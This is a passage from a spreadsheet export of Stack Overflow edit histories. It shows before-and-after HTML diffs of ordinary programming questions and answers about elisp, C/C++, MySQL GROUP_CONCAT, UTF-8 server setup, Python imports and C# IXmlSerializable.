 &lt;p&gt; There's a variable &lt;code&gt;last-command&lt;/code&gt; which is set to a symbol representative of the last thing you did. So this elisp snippet - &lt;code&gt;(&lt;span class="diff-add"&gt;descibe&lt;/span&gt;-&lt;span class="diff-add"&gt;function&lt;/span&gt; last-command)&lt;/code&gt; - ought to bring up the documentation for the thing that immediately happened&lt;span class="diff-add"&gt;.&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-add"&gt; So you could make a trivial working &lt;/span&gt;&lt;code&gt;&lt;span class="diff-add"&gt;describe-last-function&lt;/span&gt;&lt;/code&gt;&lt;span class="diff-add"&gt; like so&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;&lt;span class="diff-add"&gt;(defun describe-last-function() _x000D_
  (interactive) _x000D_
  (describe-function last-command))_x000D_
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-add"&gt; Put that elisp in &lt;/span&gt;&lt;code&gt;&lt;span class="diff-add"&gt;.emacs&lt;/span&gt;&lt;/code&gt;&lt;span class="diff-add"&gt; or equivalent, and you'll have a &lt;/span&gt;&lt;strong&gt;&lt;span class="diff-add"&gt;M-x describe-last-function&lt;/span&gt;&lt;/strong&gt;.&lt;/p&gt; _x000D_
 &lt;p&gt; If you've banged on a few keys or done something that modified last-command since the thing you're interested in, the &lt;code&gt;command-history&lt;/code&gt; function might be of interest. You can get that by &lt;strong&gt;M-x command-history&lt;/strong&gt;&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>cms</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; This is what I always do in main()&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;int main()_x000D_
{_x000D_
    &lt;span class="diff-delete"&gt;int status = 1; /* FAILURE */_x000D_
_x000D_
    &lt;/span&gt;try_x000D_
    {_x000D_
        // Do Work&lt;span class="diff-delete"&gt;_x000D_
        status = 0; /* SUCCESS */&lt;/span&gt;_x000D_
    }_x000D_
    catch(std::exception const&amp;amp; e)_x000D_
    {_x000D_
         Log(e.what());_x000D_
         // If you are feeling mad (not in main) you could rethrow! _x000D_
    }_x000D_
    catch(...)_x000D_
    {_x000D_
         Log("UNKNOWN EXCEPTION");_x000D_
         // If you are feeling mad (not in main) you could rethrow! _x000D_
    }&lt;span class="diff-delete"&gt;_x000D_
_x000D_
    return status;&lt;/span&gt;_x000D_
}_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; This is what I always do in main()&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;int main()_x000D_
{_x000D_
    try_x000D_
    {_x000D_
        // Do Work_x000D_
    }_x000D_
    catch(std::exception const&amp;amp; e)_x000D_
    {_x000D_
         Log(e.what());_x000D_
         // If you are feeling mad (not in main) you could rethrow! _x000D_
    }_x000D_
    catch(...)_x000D_
    {_x000D_
         Log("UNKNOWN EXCEPTION");_x000D_
         // If you are feeling mad (not in main) you could rethrow! _x000D_
    }_x000D_
}_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>EvilTeach</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; In my app users need to be able to enter numeric values with decimal places. The iPhone doesn't provides a keyboard that's specific for this purpose - only a number pad and a keyboard with numbers and symbols.&lt;/p&gt; _x000D_
 &lt;p&gt; Is there an easy way to use the latter and prevent any non-numeric input from being entered without having to regex the final result?&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; In my app users need to be able to enter numeric values with decimal places. The iPhone doesn't provides a keyboard that's specific for this purpose - only a number pad and a keyboard with numbers and symbols.&lt;/p&gt; _x000D_
 &lt;p&gt; Is there an easy way to use the latter and prevent any non-numeric input from being entered without having to regex the final result?&lt;/p&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-add"&gt; Thanks!&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; &lt;span class="diff-delete"&gt;I've&lt;/span&gt; seen some very weird &lt;span class="diff-delete"&gt;for&lt;/span&gt; loops when reading&lt;span class="diff-delete"&gt; code from&lt;/span&gt; other &lt;span class="diff-delete"&gt;people&lt;/span&gt;. &lt;span class="diff-delete"&gt;I've&lt;/span&gt; been trying to search for a full syntax explanation for the &lt;span class="diff-delete"&gt;for&lt;/span&gt; loop but &lt;span class="diff-delete"&gt;it's pretty much&lt;/span&gt; very hard because the word &lt;span class="diff-delete"&gt;"for" kind of&lt;/span&gt; appears in &lt;span class="diff-delete"&gt;separate&lt;/span&gt; sentences making the search almost impossible to Google.&lt;/p&gt; _x000D_
 &lt;p&gt; This question came&lt;span class="diff-delete"&gt; again&lt;/span&gt; to mind after reading &lt;a href="http://stackoverflow.com/questions/260511/russian-peasant-multiplication"&gt;this thread&lt;/a&gt; which&lt;span class="diff-delete"&gt; although has been downvoted has&lt;/span&gt; made me &lt;span class="diff-delete"&gt;wonder&lt;/span&gt;.&lt;/p&gt; _x000D_
 &lt;p&gt; The &lt;code&gt;for&lt;/code&gt; &lt;span class="diff-delete"&gt;he has there&lt;/span&gt;:&lt;/p&gt; _x000D_
 &lt;pre class="lang-c s-code-block hljs"&gt;&lt;code&gt;&lt;span class="hljs-keyword"&gt;for&lt;/span&gt;(p=&lt;span class="hljs-number"&gt;0&lt;/span&gt;;p+=(a&amp;amp;&lt;span class="hljs-number"&gt;1&lt;/span&gt;)*b,a!=&lt;span class="hljs-number"&gt;1&lt;/span&gt;;a&amp;gt;&amp;gt;=&lt;span class="hljs-number"&gt;1&lt;/span&gt;,b&amp;lt;&amp;lt;=&lt;span class="hljs-number"&gt;1&lt;/span&gt;);_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; In the middle condition there is a comma separating the two pieces of code, what does this &lt;span class="diff-delete"&gt;coma&lt;/span&gt; do? &lt;span class="diff-delete"&gt;(the&lt;/span&gt; comma on the right side I understand as it makes both &lt;code&gt;a&amp;gt;&amp;gt;=1&lt;/code&gt; and &lt;code&gt;b&amp;lt;&amp;lt;=1&lt;/code&gt;&lt;span class="diff-delete"&gt;)&lt;/span&gt; But within a loop exit condition, what happens? Does it exit when &lt;code&gt;p==0&lt;/code&gt;, when &lt;code&gt;a==1&lt;/code&gt;&lt;span class="diff-delete"&gt;,&lt;/span&gt; when both happen?&lt;/p&gt; _x000D_
 &lt;p&gt; &lt;span class="diff-delete"&gt;If someone&lt;/span&gt; could &lt;span class="diff-delete"&gt;answer&lt;/span&gt; me this and &lt;span class="diff-delete"&gt;also post&lt;/span&gt; a full&lt;span class="diff-delete"&gt; syntax explanation for the&lt;/span&gt; &lt;code&gt;for&lt;/code&gt; loop&lt;span class="diff-delete"&gt;, it would be great&lt;/span&gt;.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; &lt;span class="diff-add"&gt;I have&lt;/span&gt; seen some very weird &lt;code&gt;&lt;span class="diff-add"&gt;for&lt;/span&gt;&lt;/code&gt; loops when reading other &lt;span class="diff-add"&gt;people's code&lt;/span&gt;. &lt;span class="diff-add"&gt;I have&lt;/span&gt; been trying to search for a full syntax explanation for the &lt;code&gt;&lt;span class="diff-add"&gt;for&lt;/span&gt;&lt;/code&gt; loop&lt;span class="diff-add"&gt; in &lt;/span&gt;&lt;code&gt;&lt;span class="diff-add"&gt;C&lt;/span&gt;&lt;/code&gt; but &lt;span class="diff-add"&gt;it is&lt;/span&gt; very hard because the word &lt;span class="diff-add"&gt;"&lt;/span&gt;&lt;code&gt;&lt;span class="diff-add"&gt;for&lt;/span&gt;&lt;/code&gt;&lt;span class="diff-add"&gt;"&lt;/span&gt; appears in &lt;span class="diff-add"&gt;unrelated&lt;/span&gt; sentences making the search almost impossible to Google&lt;span class="diff-add"&gt; effectively&lt;/span&gt;.&lt;/p&gt; _x000D_
 &lt;p&gt; This question came to&lt;span class="diff-add"&gt; my&lt;/span&gt; mind after reading &lt;a href="http://stackoverflow.com/questions/260511/russian-peasant-multiplication"&gt;this thread&lt;/a&gt; which made me &lt;span class="diff-add"&gt;curious again&lt;/span&gt;.&lt;/p&gt; _x000D_
 &lt;p&gt; The &lt;code&gt;for&lt;/code&gt; &lt;span class="diff-add"&gt;here&lt;/span&gt;:&lt;/p&gt; _x000D_
 &lt;pre class="lang-c s-code-block hljs"&gt;&lt;code&gt;&lt;span class="hljs-keyword"&gt;for&lt;/span&gt;(p=&lt;span class="hljs-number"&gt;0&lt;/span&gt;;p+=(a&amp;amp;&lt;span class="hljs-number"&gt;1&lt;/span&gt;)*b,a!=&lt;span class="hljs-number"&gt;1&lt;/span&gt;;a&amp;gt;&amp;gt;=&lt;span class="hljs-number"&gt;1&lt;/span&gt;,b&amp;lt;&amp;lt;=&lt;span class="hljs-number"&gt;1&lt;/span&gt;);_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; In the middle condition there is a comma separating the two pieces of code, what does this &lt;span class="diff-add"&gt;comma&lt;/span&gt; do? &lt;span class="diff-add"&gt;The&lt;/span&gt; comma on the right side I understand as it makes both &lt;code&gt;a&amp;gt;&amp;gt;=1&lt;/code&gt; and &lt;code&gt;b&amp;lt;&amp;lt;=1&lt;/code&gt;&lt;span class="diff-add"&gt;.&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
 &lt;p&gt; But within a loop exit condition, what happens? Does it exit when &lt;code&gt;p==0&lt;/code&gt;, when &lt;code&gt;a==1&lt;/code&gt;&lt;span class="diff-add"&gt; or&lt;/span&gt; when both happen?&lt;/p&gt; _x000D_
 &lt;p&gt; &lt;span class="diff-add"&gt;It would be great if anyone&lt;/span&gt; could &lt;span class="diff-add"&gt;help&lt;/span&gt; me&lt;span class="diff-add"&gt; understand&lt;/span&gt; this and &lt;span class="diff-add"&gt;maybe point me in the direction of&lt;/span&gt; a full &lt;code&gt;for&lt;/code&gt; loop&lt;span class="diff-add"&gt; syntax description&lt;/span&gt;.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; I'm someone who writes code just for fun and haven't really delved into it in either an academic or professional setting, so stuff like these bitwise operators really escapes me.&lt;/p&gt; _x000D_
 &lt;p&gt; I was reading an article &lt;span class="diff-delete"&gt;on&lt;/span&gt; JavaScript, which apparently supports bitwise operations. I keep &lt;span class="diff-delete"&gt;watching these operations&lt;/span&gt; mentioned in&lt;span class="diff-delete"&gt; many&lt;/span&gt; places, and I've tried reading about to figure out what exactly it is, but I just don't seem to get it at all. So what are they? Clear examples would be great! :D&lt;/p&gt; _x000D_
 &lt;p&gt; Just a few more questions - what are some practical applications of bitwise operations? When might you use them?&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; I'm someone who writes code just for fun and haven't really delved into it in either an academic or professional setting, so stuff like these bitwise operators really escapes me.&lt;/p&gt; _x000D_
 &lt;p&gt; I was reading an article &lt;span class="diff-add"&gt;about&lt;/span&gt; JavaScript, which apparently supports bitwise operations. I keep &lt;span class="diff-add"&gt;seeing this operation&lt;/span&gt; mentioned in places, and I've tried reading about to figure out what exactly it is, but I just don't seem to get it at all. So what are they? Clear examples would be great! :D&lt;/p&gt; _x000D_
 &lt;p&gt; Just a few more questions - what are some practical applications of bitwise operations? When might you use them?&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>meagar</t>
  </si>
  <si>
    <t>ArifMustafa</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; Have a look at &lt;code&gt;group_concat&lt;/code&gt; if your MySQL version (4.1) supports it. See &lt;a href="http://dev.mysql.com/doc/refman/5.0/en/group-by-functions.html#function_group-concat" rel="nofollow noreferrer"&gt;http://dev.mysql.com/doc/refman/5.0/en/group-by-functions.html#function_group-concat&lt;/a&gt; for more details.&lt;/p&gt; _x000D_
 &lt;p&gt; It would look something like:&lt;/p&gt; _x000D_
 &lt;pre class="lang-sql s-code-block hljs"&gt;&lt;code&gt;&lt;span class="diff-delete"&gt;&lt;span class="hljs-keyword"&gt;SELECT&lt;/span&gt;&lt;/span&gt; &lt;span class="diff-delete"&gt;GROUP_CONCAT&lt;/span&gt;(hobbies &lt;span class="diff-delete"&gt;SEPARATOR&lt;/span&gt; &lt;span class="hljs-string"&gt;', '&lt;/span&gt;) _x000D_
&lt;span class="diff-delete"&gt;&lt;span class="hljs-keyword"&gt;FROM&lt;/span&gt;&lt;/span&gt; peoples_hobbies &lt;span class="diff-delete"&gt;&lt;span class="hljs-keyword"&gt;WHERE&lt;/span&gt;&lt;/span&gt; person_id &lt;span class="hljs-operator"&gt;=&lt;/span&gt; &lt;span class="hljs-number"&gt;5&lt;/span&gt; &lt;span class="diff-delete"&gt;&lt;span class="hljs-keyword"&gt;GROUP&lt;/span&gt;&lt;/span&gt; &lt;span class="diff-delete"&gt;&lt;span class="hljs-keyword"&gt;BY&lt;/span&gt;&lt;/span&gt; &lt;span class="hljs-string"&gt;'all'&lt;/span&gt;;_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; Have a look at &lt;code&gt;group_concat&lt;/code&gt; if your MySQL version (4.1) supports it. See &lt;a href="http://dev.mysql.com/doc/refman/5.0/en/group-by-functions.html#function_group-concat" rel="nofollow noreferrer"&gt;http://dev.mysql.com/doc/refman/5.0/en/group-by-functions.html#function_group-concat&lt;/a&gt; for more details.&lt;/p&gt; _x000D_
 &lt;p&gt; It would look something like:&lt;/p&gt; _x000D_
 &lt;pre class="lang-sql s-code-block hljs"&gt;&lt;code&gt;&lt;span class="diff-add"&gt;&lt;span class="hljs-keyword"&gt;select&lt;/span&gt;&lt;/span&gt; &lt;span class="diff-add"&gt;group_concat&lt;/span&gt;(hobbies &lt;span class="diff-add"&gt;separator&lt;/span&gt; &lt;span class="hljs-string"&gt;', '&lt;/span&gt;) _x000D_
&lt;span class="diff-add"&gt; &lt;/span&gt; &lt;span class="diff-add"&gt;&lt;span class="hljs-keyword"&gt;from&lt;/span&gt; &lt;/span&gt;peoples_hobbies &lt;span class="diff-add"&gt;&lt;span class="hljs-keyword"&gt;where&lt;/span&gt;&lt;/span&gt; person_id &lt;span class="hljs-operator"&gt;=&lt;/span&gt; &lt;span class="hljs-number"&gt;5&lt;/span&gt; &lt;span class="diff-add"&gt;&lt;span class="hljs-keyword"&gt;group&lt;/span&gt;&lt;/span&gt; &lt;span class="diff-add"&gt;&lt;span class="hljs-keyword"&gt;by&lt;/span&gt;&lt;/span&gt; &lt;span class="hljs-string"&gt;'all'&lt;/span&gt;;_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>George Garchagudashvili</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;span class="diff-delete"&gt; &amp;nbsp;&lt;/span&gt; _x000D_
 &lt;p&gt; I'm setting up a new server, and want to support UTF-8 fully in my web application. I have tried in the past on existing servers and always seem to end up having to fall back to ISO-8859-1.&lt;/p&gt; _x000D_
 &lt;p&gt; Where exactly do I need to set the encoding/charsets? I'm aware that I need to configure Apache, MySQL and PHP to do this - is there some standard checklist I can follow, or perhaps troubleshoot where the mismatches occur?&lt;/p&gt; _x000D_
 &lt;p&gt; This is for a new Linux server, running MySQL 5, PHP 5 and Apache 2.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; I'm setting up a new server, and want to support UTF-8 fully in my web application. I have tried in the past on existing servers and always seem to end up having to fall back to ISO-8859-1.&lt;/p&gt; _x000D_
 &lt;p&gt; Where exactly do I need to set the encoding/charsets? I'm aware that I need to configure Apache, MySQL and PHP to do this - is there some standard checklist I can follow, or perhaps troubleshoot where the mismatches occur?&lt;/p&gt; _x000D_
 &lt;p&gt; This is for a new Linux server, running MySQL 5, PHP 5 and Apache 2.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>PeeHaa</t>
  </si>
  <si>
    <t>Phiter</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; You could also add the sub directory to your python path so that it imports as a normal script.&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;import &lt;span class="diff-delete"&gt;os, &lt;/span&gt;sys_x000D_
sys.path.append&lt;span class="diff-delete"&gt;(os.path.abspath&lt;/span&gt;(&lt;span class="diff-delete"&gt;"../dirBar")) #&lt;/span&gt; &lt;span class="diff-delete"&gt;assume current&lt;/span&gt; &lt;span class="diff-delete"&gt;directory&lt;/span&gt; &lt;span class="diff-delete"&gt;is&lt;/span&gt; &lt;span class="diff-delete"&gt;'dirFoo'&lt;/span&gt;_x000D_
import Bar_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; You could also add the sub directory to your python path so that it imports as a normal script.&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;import sys_x000D_
sys.path.append( &lt;span class="diff-add"&gt;&amp;lt;path&lt;/span&gt; &lt;span class="diff-add"&gt;to&lt;/span&gt; &lt;span class="diff-add"&gt;dirFoo&amp;gt;&lt;/span&gt; &lt;span class="diff-add"&gt;)&lt;/span&gt;_x000D_
import Bar_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; Once a programmer decides to implement IXmlSerializable, what are the rules and best practices for implementing it? I've heard that GetSchema() should return null and ReadXml should move to the next element before returning. Are these true? And what about WriteXml: should it write a root element for the object or is it assumed that the root is already written? How should child objects be treated and written.&lt;/p&gt; _x000D_
 &lt;p&gt; Here's a sample of what I have now. I'll update it as I get good responses.&lt;/p&gt; _x000D_
 &lt;pre class="default s-code-block hljs csharp"&gt;&lt;code&gt;&lt;span class="hljs-keyword"&gt;public&lt;/span&gt; &lt;span class="hljs-keyword"&gt;class&lt;/span&gt; &lt;span class="hljs-title"&gt;Calendar&lt;/span&gt;: &lt;span class="diff-delete"&gt;&lt;span class="hljs-title"&gt;IEnumerable&lt;/span&gt;&amp;lt;&lt;span class="hljs-title"&gt;Event&lt;/span&gt;&amp;gt;&lt;/span&gt;, &lt;span class="hljs-title"&gt;IXmlSerializable&lt;/span&gt;_x000D_
{_x000D_
    &lt;span class="hljs-function"&gt;&lt;span class="hljs-keyword"&gt;public&lt;/span&gt; XmlSchema &lt;span class="hljs-title"&gt;GetSchema&lt;/span&gt;(&lt;span class="hljs-params"&gt;&lt;/span&gt;)&lt;/span&gt; { &lt;span class="hljs-keyword"&gt;return&lt;/span&gt; &lt;span class="hljs-literal"&gt;null&lt;/span&gt;; }_x000D_
_x000D_
    &lt;span class="hljs-function"&gt;&lt;span class="hljs-keyword"&gt;public&lt;/span&gt; &lt;span class="hljs-keyword"&gt;void&lt;/span&gt; &lt;span class="hljs-title"&gt;ReadXml&lt;/span&gt;(&lt;span class="hljs-params"&gt;XmlReader reader&lt;/span&gt;)&lt;/span&gt;_x000D_
    {_x000D_
        &lt;span class="hljs-keyword"&gt;if&lt;/span&gt; (reader.MoveToContent() == XmlNodeType.Element&lt;span class="diff-delete"&gt;_x000D_
           &lt;/span&gt; &amp;amp;&amp;amp; reader.LocalName == &lt;span class="hljs-string"&gt;"Calendar"&lt;/span&gt;)_x000D_
        {_x000D_
            _Name = reader[&lt;span class="hljs-string"&gt;"Name"&lt;/span&gt;];_x000D_
            _Enabled = Boolean.Parse(reader[&lt;span class="hljs-string"&gt;"Enabled"&lt;/span&gt;]);_x000D_
            _Color = Color.FromArgb(Int32.Parse(reader[&lt;span class="hljs-string"&gt;"Color"&lt;/span&gt;]));_x000D_
_x000D_
            &lt;span class="hljs-keyword"&gt;if&lt;/span&gt; (reader.ReadToDescendant(&lt;span class="hljs-string"&gt;"Event"&lt;/span&gt;))_x000D_
            {_x000D_
                &lt;span class="hljs-keyword"&gt;while&lt;/span&gt; (reader.MoveToContent() == XmlNodeType.Element&lt;span class="diff-delete"&gt; _x000D_
                   &lt;/span&gt; &amp;amp;&amp;amp; reader.LocalName == &lt;span class="hljs-string"&gt;"Event"&lt;/span&gt;)_x000D_
                {_x000D_
                    &lt;span class="hljs-keyword"&gt;var&lt;/span&gt; evt = &lt;span class="hljs-keyword"&gt;new&lt;/span&gt; Event();_x000D_
                    evt.ReadXml(reader);_x000D_
                    _Events.Add(evt);_x000D_
                }_x000D_
            }_x000D_
            reader.Read();_x000D_
        }_x000D_
    }_x000D_
_x000D_
    &lt;span class="hljs-function"&gt;&lt;span class="hljs-keyword"&gt;public&lt;/span&gt; &lt;span class="hljs-keyword"&gt;void&lt;/span&gt; &lt;span class="hljs-title"&gt;WriteXml&lt;/span&gt;(&lt;span class="hljs-params"&gt;XmlWriter writer&lt;/span&gt;)&lt;/span&gt;_x000D_
    {_x000D_
        writer.WriteAttributeString(&lt;span class="hljs-string"&gt;"Name"&lt;/span&gt;, _Name);_x000D_
        writer.WriteAttributeString(&lt;span class="hljs-string"&gt;"Enabled"&lt;/span&gt;, _Enabled.ToString());_x000D_
        writer.WriteAttributeString(&lt;span class="hljs-string"&gt;"Color"&lt;/span&gt;, _Color.ToArgb().ToString());_x000D_
_x000D_
        &lt;span class="hljs-keyword"&gt;foreach&lt;/span&gt; (&lt;span class="hljs-keyword"&gt;var&lt;/span&gt; evt &lt;span class="hljs-keyword"&gt;in&lt;/span&gt; _Events)_x000D_
        {_x000D_
            writer.WriteStartElement(&lt;span class="hljs-string"&gt;"Event"&lt;/span&gt;);_x000D_
            evt.WriteXml(writer);_x000D_
            writer.WriteEndElement();_x000D_
        }_x000D_
    }_x000D_
}_x000D_
_x000D_
&lt;span class="hljs-keyword"&gt;public&lt;/span&gt; &lt;span class="hljs-keyword"&gt;class&lt;/span&gt; &lt;span class="hljs-title"&gt;Event&lt;/span&gt; : &lt;span class="hljs-title"&gt;IXmlSerializable&lt;/span&gt;_x000D_
{_x000D_
    &lt;span class="hljs-function"&gt;&lt;span class="hljs-keyword"&gt;public&lt;/span&gt; XmlSchema &lt;span class="hljs-title"&gt;GetSchema&lt;/span&gt;(&lt;span class="hljs-params"&gt;&lt;/span&gt;)&lt;/span&gt; { &lt;span class="hljs-keyword"&gt;return&lt;/span&gt; &lt;span class="hljs-literal"&gt;null&lt;/span&gt;; }_x000D_
_x000D_
    &lt;span class="hljs-function"&gt;&lt;span class="hljs-keyword"&gt;public&lt;/span&gt; &lt;span class="hljs-keyword"&gt;void&lt;/span&gt; &lt;span class="hljs-title"&gt;ReadXml&lt;/span&gt;(&lt;span class="hljs-params"&gt;XmlReader reader&lt;/span&gt;)&lt;/span&gt;_x000D_
    {_x000D_
        &lt;span class="hljs-keyword"&gt;if&lt;/span&gt; (reader.MoveToContent() == XmlNodeType.Element&lt;span class="diff-delete"&gt; _x000D_
           &lt;/span&gt; &amp;amp;&amp;amp; reader.LocalName == &lt;span class="hljs-string"&gt;"Event"&lt;/span&gt;)_x000D_
        {_x000D_
            _Title = reader[&lt;span class="hljs-string"&gt;"Title"&lt;/span&gt;];_x000D_
            _Start = DateTime.FromBinary(Int64.Parse(reader[&lt;span class="hljs-string"&gt;"Start"&lt;/span&gt;]));_x000D_
            _Stop = DateTime.FromBinary(Int64.Parse(reader[&lt;span class="hljs-string"&gt;"Stop"&lt;/span&gt;]));_x000D_
            reader.Read();_x000D_
        }_x000D_
    }_x000D_
_x000D_
    &lt;span class="hljs-function"&gt;&lt;span class="hljs-keyword"&gt;public&lt;/span&gt; &lt;span class="hljs-keyword"&gt;void&lt;/span&gt; &lt;span class="hljs-title"&gt;WriteXml&lt;/span&gt;(&lt;span class="hljs-params"&gt;XmlWriter writer&lt;/span&gt;)&lt;/span&gt;_x000D_
    {_x000D_
        writer.WriteAttributeString(&lt;span class="hljs-string"&gt;"Title"&lt;/span&gt;, _Title);_x000D_
        writer.WriteAttributeString(&lt;span class="hljs-string"&gt;"Start"&lt;/span&gt;, _Start.ToBinary().ToString());_x000D_
        writer.WriteAttributeString(&lt;span class="hljs-string"&gt;"Stop"&lt;/span&gt;, _Stop.ToBinary().ToString());_x000D_
    }_x000D_
}_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; Once a programmer decides to implement IXmlSerializable, what are the rules and best practices for implementing it? I've heard that GetSchema() should return null and ReadXml should move to the next element before returning. Are these true? And what about WriteXml: should it write a root element for the object or is it assumed that the root is already written? How should child objects be treated and written.&lt;/p&gt; _x000D_
 &lt;p&gt; Here's a sample of what I have now. I'll update it as I get good responses.&lt;/p&gt; _x000D_
 &lt;pre class="default s-code-block hljs csharp"&gt;&lt;code&gt;&lt;span class="hljs-keyword"&gt;public&lt;/span&gt; &lt;span class="hljs-keyword"&gt;class&lt;/span&gt; &lt;span class="hljs-title"&gt;Calendar&lt;/span&gt;: &lt;span class="diff-add"&gt;&lt;span class="hljs-title"&gt;IEnumerable&lt;/span&gt;&amp;lt;&lt;span class="hljs-title"&gt;Gvent&lt;/span&gt;&amp;gt;&lt;/span&gt;, &lt;span class="hljs-title"&gt;IXmlSerializable&lt;/span&gt;_x000D_
{_x000D_
    &lt;span class="hljs-function"&gt;&lt;span class="hljs-keyword"&gt;public&lt;/span&gt; XmlSchema &lt;span class="hljs-title"&gt;GetSchema&lt;/span&gt;(&lt;span class="hljs-params"&gt;&lt;/span&gt;)&lt;/span&gt; { &lt;span class="hljs-keyword"&gt;return&lt;/span&gt; &lt;span class="hljs-literal"&gt;null&lt;/span&gt;; }_x000D_
_x000D_
    &lt;span class="hljs-function"&gt;&lt;span class="hljs-keyword"&gt;public&lt;/span&gt; &lt;span class="hljs-keyword"&gt;void&lt;/span&gt; &lt;span class="hljs-title"&gt;ReadXml&lt;/span&gt;(&lt;span class="hljs-params"&gt;XmlReader reader&lt;/span&gt;)&lt;/span&gt;_x000D_
    {_x000D_
        &lt;span class="hljs-keyword"&gt;if&lt;/span&gt; (reader.MoveToContent() == XmlNodeType.Element &amp;amp;&amp;amp; reader.LocalName == &lt;span class="hljs-string"&gt;"Calendar"&lt;/span&gt;)_x000D_
        {_x000D_
            _Name = reader[&lt;span class="hljs-string"&gt;"Name"&lt;/span&gt;];_x000D_
            _Enabled = Boolean.Parse(reader[&lt;span class="hljs-string"&gt;"Enabled"&lt;/span&gt;]);_x000D_
            _Color = Color.FromArgb(Int32.Parse(reader[&lt;span class="hljs-string"&gt;"Color"&lt;/span&gt;]));_x000D_
_x000D_
            &lt;span class="hljs-keyword"&gt;if&lt;/span&gt; (reader.ReadToDescendant(&lt;span class="hljs-string"&gt;"Event"&lt;/span&gt;))_x000D_
            {_x000D_
                &lt;span class="hljs-keyword"&gt;while&lt;/span&gt; (reader.MoveToContent() == XmlNodeType.Element &amp;amp;&amp;amp; reader.LocalName == &lt;span class="hljs-string"&gt;"Event"&lt;/span&gt;)_x000D_
                {_x000D_
                    &lt;span class="hljs-keyword"&gt;var&lt;/span&gt; evt = &lt;span class="hljs-keyword"&gt;new&lt;/span&gt; Event();_x000D_
                    evt.ReadXml(reader);_x000D_
                    _Events.Add(evt);_x000D_
                }_x000D_
            }_x000D_
            reader.Read();_x000D_
        }_x000D_
    }_x000D_
_x000D_
    &lt;span class="hljs-function"&gt;&lt;span class="hljs-keyword"&gt;public&lt;/span&gt; &lt;span class="hljs-keyword"&gt;void&lt;/span&gt; &lt;span class="hljs-title"&gt;WriteXml&lt;/span&gt;(&lt;span class="hljs-params"&gt;XmlWriter writer&lt;/span&gt;)&lt;/span&gt;_x000D_
    {_x000D_
        writer.WriteAttributeString(&lt;span class="hljs-string"&gt;"Name"&lt;/span&gt;, _Name);_x000D_
        writer.WriteAttributeString(&lt;span class="hljs-string"&gt;"Enabled"&lt;/span&gt;, _Enabled.ToString());_x000D_
        writer.WriteAttributeString(&lt;span class="hljs-string"&gt;"Color"&lt;/span&gt;, _Color.ToArgb().ToString());_x000D_
_x000D_
        &lt;span class="hljs-keyword"&gt;foreach&lt;/span&gt; (&lt;span class="hljs-keyword"&gt;var&lt;/span&gt; evt &lt;span class="hljs-keyword"&gt;in&lt;/span&gt; _Events)_x000D_
        {_x000D_
            writer.WriteStartElement(&lt;span class="hljs-string"&gt;"Event"&lt;/span&gt;);_x000D_
